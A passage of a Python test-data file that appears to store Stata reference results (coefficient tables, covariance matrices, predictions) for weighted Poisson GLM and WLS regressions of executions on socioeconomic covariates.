wtype = "fweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000293670276, 8.6300422274613, 6.132932700e-18,
.00019588037186, .00031099700472, np.nan, 1.9599639845401,
0, .09081422305585, .09800194027664, .92665739881773,
.35410444288802, -.10126605030142, .28289449641311, np.nan,
1.9599639845401, 0, -.09416451429381, .02511206083893,
-3.7497724658197, .00017699509401, -.14338324911569, -.04494577947193,
np.nan, 1.9599639845401, 0, .27652273809506,
.36749499886987, .75245306451906, .45177864537662, -.44375422418847,
.99679970037859, np.nan, 1.9599639845401, 0,
2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
0, -18.842583191417, 3.2292740757113, -5.8349284543976,
5.381365332e-09, -25.17184407602, -12.513322306813, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.1938260811459,
-2.0549026875586, .03988840483712, -12.822785889672, -.30321770581092,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
-8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
.00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
.06803953530989, -.17715756048416, 3.123995891e-07, .00106422375754,
.00063061559958, -.00844230553011, -.01177586448603, -.05361546061036,
.03844868195577, -4.358439015e-06, -.00911884619892, -.00844230553011,
.13505257419436, .14058853110927, .86184257188631, -.74146699290106,
-8.084672085e-06, -.03121758372723, -.01177586448603, .14058853110927,
.26588664618875, .75712244813913, -.35118919402718, -4.785328653e-06,
.06803953530989, -.05361546061036, .86184257188631, .75712244813913,
10.428211056061, -8.3518020608948, -.00003652286809, -.17715756048416,
.03844868195577, -.74146699290106, -.35118919402718, -8.3518020608948,
10.200525036608]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
1.6349502801895, .27835717797279, 2.7504913806915, .44458091259003,
2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
2.6135795116425, .41426089406013, .775799036026, .35101860761642,
.93375068902969, .39217269420624, .56681954860687, .27232182025909,
1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_fweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 4.033797198035106,
rc = 0,
p = 6.87057569091e-91,
chi2 = 435.3803627057688,
ll = -27.28727618329841,
N_clust = 9,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -16.30350260869269,
dispers_ps = 1.548630027479802,
deviance_ps = 15.48630027479802,
dispers_p = 1.548630027479802,
deviance_p = 15.48630027479802,
dispers_s = 1.202863083186947,
deviance_s = 12.02863083186947,
dispers = 1.202863083186947,
deviance = 12.02863083186947,
phi = 1,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson) vce(cluster id)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "cluster",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
clustvar = "id",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
wtype = "aweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000293670276, 8.6300422274633, 6.132932700e-18,
.00019588037186, .00031099700472, np.nan, 1.9599639845401,
0, .09081422305585, .09800194027665, .92665739881771,
.35410444288803, -.10126605030143, .28289449641312, np.nan,
1.9599639845401, 0, -.09416451429381, .02511206083893,
-3.7497724658192, .00017699509401, -.14338324911569, -.04494577947192,
np.nan, 1.9599639845401, 0, .27652273809507,
.36749499887001, .75245306451881, .45177864537677, -.44375422418873,
.99679970037887, np.nan, 1.9599639845401, 0,
2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
0, -18.842583191417, 3.2292740757119, -5.8349284543965,
5.381365332e-09, -25.171844076021, -12.513322306812, np.nan,
1.9599639845401, 0, -6.5630017977417, 3.193826081147,
-2.054902687558, .03988840483718, -12.822785889674, -.30321770580895,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
-8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
.00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
.06803953530995, -.1771575604842, 3.123995891e-07, .00106422375754,
.00063061559958, -.00844230553012, -.01177586448603, -.05361546061038,
.03844868195581, -4.358439015e-06, -.00911884619892, -.00844230553012,
.13505257419447, .1405885311093, .86184257188684, -.74146699290197,
-8.084672085e-06, -.03121758372723, -.01177586448603, .1405885311093,
.26588664618875, .75712244813928, -.35118919402768, -4.785328653e-06,
.06803953530995, -.05361546061038, .86184257188684, .75712244813928,
10.428211056065, -8.3518020609031, -.00003652286809, -.1771575604842,
.03844868195581, -.74146699290197, -.35118919402768, -8.3518020609031,
10.200525036615]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -27.287276183298, 7,
68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
1.6349502801895, .27835714817047, 2.7504913806915, .44458091259003,
2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
2.6135795116425, .41426089406013, .775799036026, .35101860761642,
.93375068902969, .39217269420624, .56681954860687, .27232182025909,
1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_aweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 7.055225702760191,
rc = 0,
p = 6.87057569032e-91,
chi2 = 435.380362705941,
ll = -52.96941847346162,
N_clust = 9,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -4.982438296344967,
dispers_ps = 3.006164170990202,
deviance_ps = 30.06164170990202,
dispers_p = 3.006164170990202,
deviance_p = 30.06164170990202,
dispers_s = 2.33496951442172,
deviance_s = 23.34969514421719,
dispers = 2.33496951442172,
deviance = 23.34969514421719,
phi = 1,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson) vce(cluster id)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "cluster",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
clustvar = "id",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
wtype = "pweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000293670276, 8.6300422274613, 6.132932700e-18,
.00019588037186, .00031099700472, np.nan, 1.9599639845401,
0, .09081422305585, .09800194027664, .92665739881773,
.35410444288802, -.10126605030142, .28289449641311, np.nan,
1.9599639845401, 0, -.09416451429381, .02511206083893,
-3.7497724658197, .00017699509401, -.14338324911569, -.04494577947193,
np.nan, 1.9599639845401, 0, .27652273809506,
.36749499886987, .75245306451906, .45177864537662, -.44375422418847,
.99679970037859, np.nan, 1.9599639845401, 0,
2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
0, -18.842583191417, 3.2292740757113, -5.8349284543976,
5.381365332e-09, -25.17184407602, -12.513322306813, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.1938260811459,
-2.0549026875586, .03988840483712, -12.822785889672, -.30321770581092,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
-8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
.00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
.06803953530989, -.17715756048416, 3.123995891e-07, .00106422375754,
.00063061559958, -.00844230553011, -.01177586448603, -.05361546061036,
.03844868195577, -4.358439015e-06, -.00911884619892, -.00844230553011,
.13505257419436, .14058853110927, .86184257188631, -.74146699290106,
-8.084672085e-06, -.03121758372723, -.01177586448603, .14058853110927,
.26588664618875, .75712244813913, -.35118919402718, -4.785328653e-06,
.06803953530989, -.05361546061036, .86184257188631, .75712244813913,
10.428211056061, -8.3518020608948, -.00003652286809, -.17715756048416,
.03844868195577, -.74146699290106, -.35118919402718, -8.3518020608948,
10.200525036608]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -52.969418473462, 7,
119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
1.6349502801895, .27835717797279, 2.7504913806915, .44458091259003,
2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
2.6135795116425, .41426089406013, .775799036026, .35101860761642,
.93375068902969, .39217269420624, .56681954860687, .27232182025909,
1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_pweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
rank = 7,
ll_0 = -55.23556912834824,
ll = -47.54122045581504,
r2_a = .3528737432046668,
rss = 267.3132086911238,
mss = 393.6105745962962,
rmse = 5.17023412130557,
r2 = .5955460895029168,
F = .7279778160729128,
df_r = 10,
df_m = 6,
N = 17,
cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], vce(robust)",
title = "Linear regression",
marginsok = "XB default",
vce = "robust",
depvar = "executions",
cmd = "regress",
properties = "b V",
predict = "regres_p",
model = "ols",
estat_cmd = "regress_estat",
wexp = "= fweight",
wtype = "aweight",
vcetype = "Robust",
)
params_table = np.array([
.00177624355887, .00100571734546, 1.7661458926668, .10782432028789,
-.00046463433267, .0040171214504, 10, 2.2281388519863,
0, .70240571372092, .54986275700055, 1.2774200557835,
.23031379083217, -.5227648584123, 1.9275762858541, 10,
2.2281388519863, 0, -.76566360596606, .46482124106144,
-1.6472216377583, .13053265392051, -1.8013498724035, .27002266047141,
10, 2.2281388519863, 0, 5.7915855647065,
5.8518623033717, .98969956305525, .34566324660643, -7.2471761899099,
18.830347319323, 10, 2.2281388519863, 0,
13.018291494864, 7.3741002410906, 1.7654074489417, .10795348742173,
-3.412227750751, 29.44881074048, 10, 2.2281388519863,
0, -140.99921608421, 84.973820309491, -1.6593253730463,
.12803894207791, -330.33268651749, 48.334254349065, 10,
2.2281388519863, 0, -68.484290889814, 50.764306481463,
-1.3490638528633, .20706938025917, -181.5942144553, 44.625632675673,
10, 2.2281388519863, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.011467379e-06, .00038778854684, -.00038909911416, .00356508765632,
.0056952104088, -.07926157334067, -.04218673068644, .00038778854684,
.30234905153625, -.10112236243026, .59175926747871, 1.4744074711876,
-25.6203584288, -14.793319880623, -.00038909911416, -.10112236243026,
.21605878614189, -2.3405630815795, -3.2257627901142, 31.66920792546,
20.934058595259, .00356508765632, .59175926747871, -2.3405630815795,
34.244292417623, 34.810403897967, -270.34292245471, -270.19382562804,
.0056952104088, 1.4744074711876, -3.2257627901142, 34.810403897967,
54.377354365652, -414.2817137548, -324.24739845086, -.07926157334067,
-25.6203584288, 31.66920792546, -270.34292245471, -414.2817137548,
7220.5501379896, 2907.4556071681, -.04218673068644, -14.793319880623,
20.934058595259, -270.19382562804, -324.24739845086, 2907.4556071681,
2577.0148125439]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, -55.235569128348, -47.541220455815, 7,
109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
23.018356323242, 11.030969619751, 7.6487560272217, 3.2376720905304,
1.3298480510712, 2.4579885005951, 6.7120413780212, 2.8951823711395,
.90416890382767, 2.1985862255096, 1.9608836174011, 2.5452246665955,
4.6054129600525, 2.8738057613373, 2.9902882575989, 1.8505314588547,
1.4887162446976, 1.47836124897, 5.9044842720032, 4.8891386985779,
7.0818486213684, 4.6786789894104, 7.5460968017578, 5.5129766464233,
4.1125593185425, 2.3989260196686, -2.7979807853699, 3.8943622112274,
-1.4647831916809, 2.8729522228241, -3.5234127044678, 3.7701880931854,
3.9779393672943, 1.9573417901993]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_wls_aweight_robust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
rank = 7,
ll_0 = -55.23556912834824,
ll = -47.54122045581504,
r2_a = .3528737432046668,
rss = 267.3132086911238,
mss = 393.6105745962962,
rmse = 5.17023412130557,
r2 = .5955460895029168,
F = 1.412187242235973,
df_r = 8,
df_m = 6,
N = 17,
N_clust = 9,
cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], vce(cluster id)",
title = "Linear regression",
marginsok = "XB default",
vce = "cluster",
depvar = "executions",
cmd = "regress",
properties = "b V",
predict = "regres_p",
model = "ols",
estat_cmd = "regress_estat",
wexp = "= fweight",
wtype = "aweight",
vcetype = "Robust",
clustvar = "id",
)
params_table = np.array([
.00177624355887, .00103574504038, 1.7149428571794, .12469817836724,
-.00061218878728, .00416467590501, 8, 2.3060041352042,
0, .70240571372092, .64463869959516, 1.0896114585768,
.30761438040884, -.78413379325815, 2.1889452207, 8,
2.3060041352042, 0, -.76566360596606, .50850811868177,
-1.5057057652313, .17056206446331, -1.9382854304311, .40695821849901,
8, 2.3060041352042, 0, 5.7915855647065,
6.2948340440059, .92005373362009, .3844480847801, -8.7243277711951,
20.307498900608, 8, 2.3060041352042, 0,
13.018291494864, 7.9526248350517, 1.6369804642972, .14027059672576,
-5.3204942604922, 31.357077250221, 8, 2.3060041352042,
0, -140.99921608421, 84.897180497105, -1.6608233071889,
.13532738016362, -336.77246537771, 54.774033209288, 8,
2.3060041352042, 0, -68.484290889814, 50.203382265366,
-1.3641369923608, .2096627597382, -184.25349799498, 47.284916215355,
8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.072767789e-06, .00042569049255, -.00044272344175, .00386796354086,
.00653558563917, -.08376884119522, -.04513384476642, .00042569049255,
.41555905301573, -.07730648264729, -.34087330734824, .82631440946934,
-31.768811666606, -10.324414524804, -.00044272344175, -.07730648264729,
.25858050676528, -2.8727606144729, -3.9481543148554, 35.836754991381,
24.653552354067, .00386796354086, -.34087330734824, -2.8727606144729,
39.624935641576, 42.351437415382, -335.98208369348, -283.16728769825,
.00653558563917, .82631440946934, -3.9481543148554, 42.351437415382,
63.24424176708, -502.21726015398, -366.49477518415, -.08376884119522,
-31.768811666606, 35.836754991381, -335.98208369348, -502.21726015398,
7207.531256358, 3532.1379707168, -.04513384476642, -10.324414524804,
24.653552354067, -283.16728769825, -366.49477518415, 3532.1379707168,
2520.3795908825]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, -55.235569128348, -47.541220455815, 7,
109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
23.018356323242, 11.727355003357, 7.6487560272217, 3.4638004302979,
1.3298480510712, 2.1195623874664, 6.7120413780212, 2.8227334022522,
.90416890382767, 2.2036759853363, 1.9608836174011, 2.0707910060883,
4.6054129600525, 2.9022018909454, 2.9902882575989, 1.6939970254898,
1.4887162446976, 1.8477793931961, 5.9044842720032, 4.8752007484436,
7.0818486213684, 4.4365234375, 7.5460968017578, 5.6850047111511,
4.1125593185425, 2.7407164573669, -2.7979807853699, 3.9614858627319,
-1.4647831916809, 2.4376966953278, -3.5234127044678, 3.5529434680939,
3.9779393672943, 1.7075037956238]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_wls_aweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
rank = 7,
ll_0 = -107.2219871314995,
ll = -92.28589853187629,
r2_a = .5022105716958969,
rss = 518.9021109886529,
mss = 764.067585981045,
rmse = 4.467412394167744,
r2 = .5955460895029162,
F = 1.835843414931295,
df_r = 8,
df_m = 6,
N = 33,
N_clust = 9,
cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], vce(cluster id)",
title = "Linear regression",
marginsok = "XB default",
vce = "cluster",
depvar = "executions",
cmd = "regress",
properties = "b V",
predict = "regres_p",
model = "ols",
estat_cmd = "regress_estat",
wexp = "= fweight",
wtype = "fweight",
vcetype = "Robust",
clustvar = "id",
)
params_table = np.array([
.00177624355887, .00090840849363, 1.9553357012053, .08627786102497,
-.00031855018389, .00387103730162, 8, 2.3060041352042,
0, .70240571372091, .56538554103558, 1.2423482079757,
.24928937729829, -.60137568189177, 2.0061871093336, 8,
2.3060041352042, 0, -.76566360596606, .44599112337258,
-1.7167687109468, .12435346910262, -1.7941209807276, .26279376879547,
8, 2.3060041352042, 0, 5.7915855647065,
5.5209346785031, 1.0490226568442, .32482245151877, -6.9397126341137,
18.522883763527, 8, 2.3060041352042, 0,
13.018291494864, 6.9749133861223, 1.866444896759, .09894610636006,
-3.0658876162246, 29.102470605953, 8, 2.3060041352042,
0, -140.99921608421, 74.459752971542, -1.8936299202886,
.09489418422765, -312.70371434287, 30.705282174445, 8,
2.3060041352042, 0, -68.484290889814, 44.031279012175,
-1.5553554751584, .15847103736706, -170.02060237022, 33.05202059059,
8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.252059913e-07, .00032745422504, -.00034055649365, .00297535656989,
.0050273735686, -.06443757015017, -.03471834212801, .00032745422504,
.31966081001209, -.05946652511329, -.26221023642171, .63562646882257,
-24.437547435849, -7.9418573267692, -.00034055649365, -.05946652511329,
.19890808212714, -2.2098158572872, -3.037041780658, 27.566734608754,
18.96427104159, .00297535656989, -.26221023642171, -2.2098158572872,
30.480719724298, 32.578028781062, -258.44775668729, -217.82099053713,
.0050273735686, .63562646882257, -3.037041780658, 32.578028781062,
48.649416743908, -386.32096934921, -281.91905783396, -.06443757015017,
-24.437547435849, 27.566734608754, -258.44775668729, -386.32096934921,
5544.254812583, 2717.0292082435, -.03471834212801, -7.9418573267692,
18.96427104159, -217.82099053713, -281.91905783396, 2717.0292082435,
1938.753531448]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
33, -107.2219871315, -92.285898531876, 7,
198.57179706375, 209.04734999402])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
23.018356323242, 10.285571098328, 7.6487560272217, 3.0379540920258,
1.3298480510712, 1.8589791059494, 6.7120413780212, 2.4757008552551,
.90416890382767, 1.9327516555786, 1.9608836174011, 1.8162038326263,
4.6054129600525, 2.5453994274139, 2.9902882575989, 1.485733628273,
1.4887162446976, 1.6206097602844, 5.9044842720032, 4.2758340835571,
7.0818486213684, 3.8910882472992, 7.5460968017578, 4.9860787391663,
4.1125593185425, 2.4037673473358, -2.7979807853699, 3.4744529724121,
-1.4647831916809, 2.1380014419556, -3.5234127044678, 3.1161375045776,
3.9779393672943, 1.4975799322128]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_wls_fweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
rank = 7,
ll_0 = -55.23556912834824,
ll = -47.54122045581504,
r2_a = .3528737432046668,
rss = 267.3132086911238,
mss = 393.6105745962962,
rmse = 5.17023412130557,
r2 = .5955460895029168,
F = 1.412187242235973,
df_r = 8,
df_m = 6,
N = 17,
N_clust = 9,
cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], vce(cluster id)",
title = "Linear regression",
marginsok = "XB default",
vce = "cluster",
depvar = "executions",
cmd = "regress",
properties = "b V",
predict = "regres_p",
model = "ols",
estat_cmd = "regress_estat",
wexp = "= fweight",
wtype = "pweight",
vcetype = "Robust",
clustvar = "id",
)
params_table = np.array([
.00177624355887, .00103574504038, 1.7149428571794, .12469817836724,
-.00061218878728, .00416467590501, 8, 2.3060041352042,
0, .70240571372092, .64463869959516, 1.0896114585768,
.30761438040884, -.78413379325815, 2.1889452207, 8,
2.3060041352042, 0, -.76566360596606, .50850811868177,
-1.5057057652313, .17056206446331, -1.9382854304311, .40695821849901,
8, 2.3060041352042, 0, 5.7915855647065,
6.2948340440059, .92005373362009, .3844480847801, -8.7243277711951,
20.307498900608, 8, 2.3060041352042, 0,
13.018291494864, 7.9526248350517, 1.6369804642972, .14027059672576,
-5.3204942604922, 31.357077250221, 8, 2.3060041352042,
0, -140.99921608421, 84.897180497105, -1.6608233071889,
.13532738016362, -336.77246537771, 54.774033209288, 8,
2.3060041352042, 0, -68.484290889814, 50.203382265366,
-1.3641369923608, .2096627597382, -184.25349799498, 47.284916215355,
8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.072767789e-06, .00042569049255, -.00044272344175, .00386796354086,
.00653558563917, -.08376884119522, -.04513384476642, .00042569049255,
.41555905301573, -.07730648264729, -.34087330734824, .82631440946934,
-31.768811666606, -10.324414524804, -.00044272344175, -.07730648264729,
.25858050676528, -2.8727606144729, -3.9481543148554, 35.836754991381,
24.653552354067, .00386796354086, -.34087330734824, -2.8727606144729,
39.624935641576, 42.351437415382, -335.98208369348, -283.16728769825,
.00653558563917, .82631440946934, -3.9481543148554, 42.351437415382,
63.24424176708, -502.21726015398, -366.49477518415, -.08376884119522,
-31.768811666606, 35.836754991381, -335.98208369348, -502.21726015398,
7207.531256358, 3532.1379707168, -.04513384476642, -10.324414524804,
24.653552354067, -283.16728769825, -366.49477518415, 3532.1379707168,
2520.3795908825]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, -55.235569128348, -47.541220455815, 7,
109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
23.018356323242, 11.727355003357, 7.6487560272217, 3.4638004302979,
1.3298480510712, 2.1195623874664, 6.7120413780212, 2.8227334022522,
.90416890382767, 2.2036759853363, 1.9608836174011, 2.0707910060883,
4.6054129600525, 2.9022018909454, 2.9902882575989, 1.6939970254898,
1.4887162446976, 1.8477793931961, 5.9044842720032, 4.8752007484436,
7.0818486213684, 4.4365234375, 7.5460968017578, 5.6850047111511,
4.1125593185425, 2.7407164573669, -2.7979807853699, 3.9614858627319,
-1.4647831916809, 2.4376966953278, -3.5234127044678, 3.5529434680939,
3.9779393672943, 1.7075037956238]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_wls_pweight_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
| 45.162473
| 147
